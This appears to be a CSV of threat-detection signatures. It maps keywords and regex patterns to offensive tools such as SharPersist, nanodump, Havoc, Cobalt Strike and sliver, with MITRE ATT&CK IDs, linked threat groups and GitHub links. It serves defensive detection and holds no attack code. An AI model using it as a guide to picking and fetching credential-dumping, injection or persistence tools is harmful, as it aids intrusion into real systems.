"*INFO: Adding keepass backdoor persistence*",".{0,1000}INFO\:\sAdding\skeepass\sbackdoor\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","48464"
"*INFO: Adding registry persistence*",".{0,1000}INFO\:\sAdding\sregistry\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","48465"
"*INFO: Adding scheduled task backdoor persistence*",".{0,1000}INFO\:\sAdding\sscheduled\stask\sbackdoor\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","48466"
"*INFO: Adding scheduled task persistence*",".{0,1000}INFO\:\sAdding\sscheduled\stask\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","48467"
"*INFO: Adding service persistence*",".{0,1000}INFO\:\sAdding\sservice\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","48468"
"*INFO: Adding startup folder persistence*",".{0,1000}INFO\:\sAdding\sstartup\sfolder\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","48469"
"*INFO: Adding tortoise svn persistence*",".{0,1000}INFO\:\sAdding\stortoise\ssvn\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","48470"
"*INFO: Checking backdoor present in KeePass config file*",".{0,1000}INFO\:\sChecking\sbackdoor\spresent\sin\sKeePass\sconfig\sfile.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","48471"
"*INFO: Listing all scheduled tasks available to backdoor.*",".{0,1000}INFO\:\sListing\sall\sscheduled\stasks\savailable\sto\sbackdoor\..{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","48472"
"*info@skelsecprojects.com*",".{0,1000}info\@skelsecprojects\.com.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","#email","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","48475"
"*info@tor2web.org*",".{0,1000}info\@tor2web\.org.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#email","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","48476"
"*infoga.py -*",".{0,1000}infoga\.py\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48477"
"*Information Collection via DLL Injection (Ring3 Hook)*",".{0,1000}Information\sCollection\svia\sDLL\sInjection\s\(Ring3\sHook\).{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","48478"
"*information_gathering_tools.py*",".{0,1000}information_gathering_tools\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1059 - T1078 - T1105 - T1110 - T1566","TA0002 - TA0008 - TA0009 - TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","N/A","10","52217","5629","2025-03-03T15:17:19Z","2020-04-11T09:21:31Z","48479"
"*InfosecMatter/Minimalistic-offensive-security-tools*",".{0,1000}InfosecMatter\/Minimalistic\-offensive\-security\-tools.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","1","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","48480"
"*infosecn1nja/SharpDoor*",".{0,1000}infosecn1nja\/SharpDoor.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","N/A","7","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","48481"
"*infosecn1nja/SharpDoor*",".{0,1000}infosecn1nja\/SharpDoor.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","N/A","9","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","48482"
"*Initial_Access.ps1*",".{0,1000}Initial_Access\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","48484"
"*InitialAccess_SpearphishingAttachment_FakeWordDoc.py*",".{0,1000}InitialAccess_SpearphishingAttachment_FakeWordDoc\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","48485"
"*InitialAccess_SpearphishingAttachment_Windows.py*",".{0,1000}InitialAccess_SpearphishingAttachment_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","48486"
"*Initialised lsarelayx*",".{0,1000}Initialised\slsarelayx.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","48487"
"*initialize_fake_thread_state*",".{0,1000}initialize_fake_thread_state.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","48488"
"*initialize_spoofed_callstack*",".{0,1000}initialize_spoofed_callstack.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","48489"
"*initializeShellcodeFluctuation*",".{0,1000}initializeShellcodeFluctuation.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","N/A","10","10","1012","160","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z","48490"
"*Initializing domainDumper()*",".{0,1000}Initializing\sdomainDumper\(\).{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","48491"
"*Initializing SharpHound at *",".{0,1000}Initializing\sSharpHound\sat\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","48493"
"*Initializing SharpHound at *",".{0,1000}Initializing\sSharpHound\sat\s.{0,1000}","offensive_tool_keyword","sharphound","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","48494"
"*Initializing SharpHound at {time} on {date}*",".{0,1000}Initializing\sSharpHound\sat\s\{time\}\son\s\{date\}.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","48495"
"*initstring/cloud_enum*",".{0,1000}initstring\/cloud_enum.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","N/A","6","10","1794","271","2024-10-10T08:16:59Z","2019-05-31T09:14:05Z","48496"
"*inject *.dll into a process as a proxy to interact with the target named pipe server*",".{0,1000}inject\s.{0,1000}\.dll\sinto\sa\sprocess\sas\sa\sproxy\sto\sinteract\swith\sthe\starget\snamed\spipe\sserver.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","48497"
"*inject 1337 /*",".{0,1000}inject\s1337\s\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","48498"
"*Inject into the proxy process and let it open a named pipe server.*",".{0,1000}Inject\sinto\sthe\sproxy\sprocess\sand\slet\sit\sopen\sa\snamed\spipe\sserver\..{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","48499"
"*Inject module and start PtC-RPC server inside LSASS*",".{0,1000}Inject\smodule\sand\sstart\sPtC\-RPC\sserver\sinside\sLSASS.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","48500"
"*Inject shellcode on the server.\\nUsage: inject*",".{0,1000}Inject\sshellcode\son\sthe\sserver\.\\\\nUsage\:\sinject.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","N/A","10","10","541","124","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z","48501"
"*inject shellcode*",".{0,1000}inject\sshellcode.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","48502"
"*inject.spawn*",".{0,1000}inject\.spawn.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","48503"
"*inject.spoofaddr*",".{0,1000}inject\.spoofaddr.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","48504"
"*inject_dll_reflective.py*",".{0,1000}inject_dll_reflective\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","48505"
"*inject_dll_srdi.py*",".{0,1000}inject_dll_srdi\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","48506"
"*inject_macro_word(*",".{0,1000}inject_macro_word\(.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","N/A","10","","N/A","","","","48507"
"*inject_shellcode.py*",".{0,1000}inject_shellcode\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","48508"
"*inject_shellcode_self*",".{0,1000}inject_shellcode_self.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","48509"
"*inject-amsiBypass *",".{0,1000}inject\-amsiBypass\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/injectAmsiBypass","1","0","N/A","N/A","10","10","378","69","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z","48510"
"*inject-amsi-bypass*",".{0,1000}inject\-amsi\-bypass.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","48511"
"*inject-amsiBypass.*",".{0,1000}inject\-amsiBypass\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","N/A","10","10","378","69","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z","48512"
"*InjectApp.InfectClickonceApp(*",".{0,1000}InjectApp\.InfectClickonceApp\(.{0,1000}","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","48513"
"*inject-assembly *",".{0,1000}inject\-assembly\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/inject-assembly","1","0","N/A","N/A","10","10","494","74","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z","48514"
